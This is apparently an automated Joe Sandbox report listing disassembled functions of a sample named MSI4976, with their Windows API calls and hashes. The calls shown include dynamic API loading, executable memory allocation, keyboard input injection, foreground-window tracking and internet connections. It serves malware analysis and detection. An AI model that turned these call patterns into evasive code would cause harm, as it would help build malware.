                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 2574300362-192647395
                                        • Opcode ID: eaf7806654aac955120054bac48181d74782f473c9a7d67fff3fd5c8ab2b1756
                                        • Instruction ID: dce8b20a3d26d7c878c88d34096bf4e897fd54bf0bcc6f499145ad6090399bf1
                                        • Opcode Fuzzy Hash: eaf7806654aac955120054bac48181d74782f473c9a7d67fff3fd5c8ab2b1756
                                        • Instruction Fuzzy Hash: B8D0A9765007228FD7235F71F84968337ECAB34302F01542AE487E26A8DBB0C8808A60
                                        Function 0033E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0033E6D9,0000000C,0033E55B,003BDC28,?,?), ref: 0033E6F1
                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0033E703
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: IsWow64Process$kernel32.dll
                                        • API String ID: 2574300362-3024904723
                                        • Opcode ID: 8eea4a3a618b738b58fd4e18f2cc3403588dc292e0006db73958c7250117fb6e
                                        • Instruction ID: 7f7ff7b83a000f43d78525189055c16a109e9b2335acee50c5d7b3b6b77f878c
                                        • Opcode Fuzzy Hash: 8eea4a3a618b738b58fd4e18f2cc3403588dc292e0006db73958c7250117fb6e
                                        • Instruction Fuzzy Hash: F6D0A9755003128FD7222F61F88C6837BE8BB15302F01442BE897D2690DBB4C8808AA0
                                        Function 0037EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0037EBAF,?,0037EAAC), ref: 0037EBC7
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0037EBD9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        • Opcode ID: adc0010e6495c55a8dc9fcd264208151f908b2bea02959807c2cd2faaccf3c0e
                                        • Instruction ID: 4f50a243f7942dad0fa9a3c080cab4cd92e0e8b9d8dd8e1817bf3d0fd59fa880
                                        • Opcode Fuzzy Hash: adc0010e6495c55a8dc9fcd264208151f908b2bea02959807c2cd2faaccf3c0e
                                        • Instruction Fuzzy Hash: 84D0A9755083128FD7321F72F848A823BE8AB18304F21C46EF89BE2650DBB4D8808A60
                                        Function 0036137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,0036135F,?,00361440), ref: 00361389
                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0036139B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1071820185
                                        • Opcode ID: ef63d8003064bdecd4b8c3e265467d9944918b34506881749a1badc08055dc81
                                        • Instruction ID: 90dc5e5817c95d21b9ecef0c685d058b5a6381dbc4d1c89bdedfd6fb0a862604
                                        • Opcode Fuzzy Hash: ef63d8003064bdecd4b8c3e265467d9944918b34506881749a1badc08055dc81
                                        • Instruction Fuzzy Hash: A6D0A9399003129FD7220F64F80878236E8AF04308F29882AE487D2B50DAB0C8808B50
                                        Function 003613A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00361371,?,00361519), ref: 003613B4
                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003613C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1587604923
                                        • Opcode ID: 356b29e328ff36365d12bcbeb2ca440be1cf906ad933fdf570ac18bfb2b0361c
                                        • Instruction ID: b239c564428832e1eac0f4da47c2687b2a2f0e9286b362b882c3842f4627e6ba
                                        • Opcode Fuzzy Hash: 356b29e328ff36365d12bcbeb2ca440be1cf906ad933fdf570ac18bfb2b0361c
                                        • Instruction Fuzzy Hash: 99D0A939A043129FD7230F64F80868236ECAB42304F25882AE497D2B68DAB0C8808B50
                                        Function 00383ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00383AC2,?,003829F5), ref: 00383ADA
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00383AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2574300362-4033151799
                                        • Opcode ID: ebe6409b6fa5f2e8805300660683d8bb065e345448808f9b3acda5ad2f909761
                                        • Instruction ID: 1c164932cb4155f1f7f4d8dfafba78425c4836af6dc10440323651e42f8ef905
                                        • Opcode Fuzzy Hash: ebe6409b6fa5f2e8805300660683d8bb065e345448808f9b3acda5ad2f909761
                                        • Instruction Fuzzy Hash: 77D0C9716007139FD766AF65F80D68276E8AF16B15F11446AE4E7E2B50EFF4C8808B50
                                        Function 0032AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00376AA6), ref: 0032AB2D
                                        • _wcscmp.LIBCMT ref: 0032AB49
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcscmp
                                        • String ID:
                                        • API String ID: 820872866-0
                                        • Opcode ID: a89a8e0fd6b5989ea6afceed591910e205b289d2b02aebfea35a2aeba23b7492
                                        • Instruction ID: e04a4a031c98ea93c51c19831d1a5b038cd6a534bf0c4de1d440f7b9a428aa14
                                        • Opcode Fuzzy Hash: a89a8e0fd6b5989ea6afceed591910e205b289d2b02aebfea35a2aeba23b7492
                                        • Instruction Fuzzy Hash: C9A10470B00926DBDB16DF64F98166EBBA5FF48300F61456AEC56C7290EB309861CB82
                                        Function 00380D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 00380D85
                                        • CharLowerBuffW.USER32(?,?), ref: 00380DC8
                                          • Part of subcall function 00380458: CharLowerBuffW.USER32(?,?,?,?), ref: 00380478
                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00380FB2
                                        • _memmove.LIBCMT ref: 00380FC2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                        • String ID:
                                        • API String ID: 3659485706-0
                                        • Opcode ID: 14a927787a8b005c49c9e72518b398a9bb7f4a518c524a291c570c2a9147c639
                                        • Instruction ID: f057e586820405d700aa504b11a5e40418d6ea19cb147f99169f3ed3c58de45b
                                        • Opcode Fuzzy Hash: 14a927787a8b005c49c9e72518b398a9bb7f4a518c524a291c570c2a9147c639
                                        • Instruction Fuzzy Hash: 05B19E756047008FC756EF28C88096AB7E4EF89714F1588ADF889DB352DB31ED46CB81
                                        Function 0037AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0037AF56
                                        • CoUninitialize.COMBASE ref: 0037AF61
                                          • Part of subcall function 00361050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003610B8
                                        • VariantInit.OLEAUT32(?), ref: 0037AF6C
                                        • VariantClear.OLEAUT32(?), ref: 0037B23F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                        • String ID:
                                        • API String ID: 780911581-0
                                        • Opcode ID: 49f254a0b43f0b7103bfdc86264856e51f749b90f83cd9f66ed4ee5b3dce35e6
                                        • Instruction ID: 3c6baa1c17b174659f93ed0dfde10c675036f396e91dea307708a3a77c1cd2c5
                                        • Opcode Fuzzy Hash: 49f254a0b43f0b7103bfdc86264856e51f749b90f83cd9f66ed4ee5b3dce35e6
                                        • Instruction Fuzzy Hash: 2CA15A756047019FD722EF15C891B5AB7F4BF89320F058459F99AAB3A2CB34ED40CB82
                                        Function 003442EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                        • String ID:
                                        • API String ID: 3877424927-0
                                        • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction ID: c61afd4fdb2fbc1c7a45ef7a9e393de8747101a3564f48cc0538d674b08f7726
                                        • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction Fuzzy Hash: 0A51BE34A00705DBDB268FBA88807AE77E5AF40720F258739F8659E6D1D770FE619B40
                                        Function 0036EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0036EF32
                                        • GetLastError.KERNEL32(?,00000000), ref: 0036EF58
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0036EF7D
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0036EFA9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 450fa6c8b77936d9e0f79adb2290014320e7b0f5581485c59f83dd87e3a10871
                                        • Instruction ID: 793e3254745d507af8f0a8f1a00c5fe2e7f946758db75aa4367c83871d484c59
                                        • Opcode Fuzzy Hash: 450fa6c8b77936d9e0f79adb2290014320e7b0f5581485c59f83dd87e3a10871
                                        • Instruction Fuzzy Hash: 4F414B39600621DFCB12EF15C595A49BBE5EF89720B19C088E846AF362CB34FD41CB91
                                        Function 0038D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 0038D617
                                        • GetWindowRect.USER32(?,?), ref: 0038D68D
                                        • PtInRect.USER32(?,?,0038EB2C), ref: 0038D69D
                                        • MessageBeep.USER32(00000000), ref: 0038D70E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: dfe47ec306e13e217c6d406c4d4d43c9e046b4a7da56679429115adad76a77ec
                                        • Instruction ID: 18c427cbb21724006c549851454f58aadafd9aa1ca8e0f93495677ac647a212c
                                        • Opcode Fuzzy Hash: dfe47ec306e13e217c6d406c4d4d43c9e046b4a7da56679429115adad76a77ec
                                        • Instruction Fuzzy Hash: 5E416B31A00259DFCB23EF58D884BA97BF9BB49310F5981AAE409DF2D1E731E841CB50
                                        Function 00364497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 003644EE
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0036450A
                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0036456A
                                        • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 003645C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: dc31568c29598ae39bb58c558ce449e3e9702311f08b360b5986158847cff7e5
                                        • Instruction ID: 2473e6fa6cdcd136568633a93884b201f2051c87ec764c29eed6eeb3382ed204
                                        • Opcode Fuzzy Hash: dc31568c29598ae39bb58c558ce449e3e9702311f08b360b5986158847cff7e5
                                        • Instruction Fuzzy Hash: 89310471E002586FEF278B6488097FE7BB99B4B310F05825AF2C3576C9C7748A48D761
                                        Function 00354DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00354DE8
                                        • __isleadbyte_l.LIBCMT ref: 00354E16
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00354E44
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00354E7A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: b3237a6949572208584ddc0664307f353e629f02ce7bbccbfa0213d2b51b242f
                                        • Instruction ID: 4df42bb4ab8d90a96a921d57bdab8e0215141f4b5e393eda324c5746de498543
                                        • Opcode Fuzzy Hash: b3237a6949572208584ddc0664307f353e629f02ce7bbccbfa0213d2b51b242f
                                        • Instruction Fuzzy Hash: 1631A331600205AFDF2A8F74C846FAA7BB9FF41319F164518E8618B1B1E730D895DB90
                                        Function 00387AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00387AB6
                                          • Part of subcall function 003669C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 003669E3
                                          • Part of subcall function 003669C9: GetCurrentThreadId.KERNEL32 ref: 003669EA
                                          • Part of subcall function 003669C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003669F1
                                        • GetCaretPos.USER32(?), ref: 00387AC7
                                        • ClientToScreen.USER32(00000000,?), ref: 00387B00
                                        • GetForegroundWindow.USER32 ref: 00387B06
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 03bceaacb69e4006e22e7c0c7fcdb16f9e3179648fbb783cc75da1f99e3c0d77
                                        • Instruction ID: a437c1567ac1c1162512cf97aa53ce41337d2839f3609a7fe0a35481f3dddd26
                                        • Opcode Fuzzy Hash: 03bceaacb69e4006e22e7c0c7fcdb16f9e3179648fbb783cc75da1f99e3c0d77
                                        • Instruction Fuzzy Hash: 2C31F076D00108AFDB01EFB5D8859EFBBFDEF59314B11806AF815E7211DA359E058BA0
                                        Function 0037497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003749B7
                                          • Part of subcall function 00374A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00374A60
                                          • Part of subcall function 00374A41: InternetCloseHandle.WININET(00000000), ref: 00374AFD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
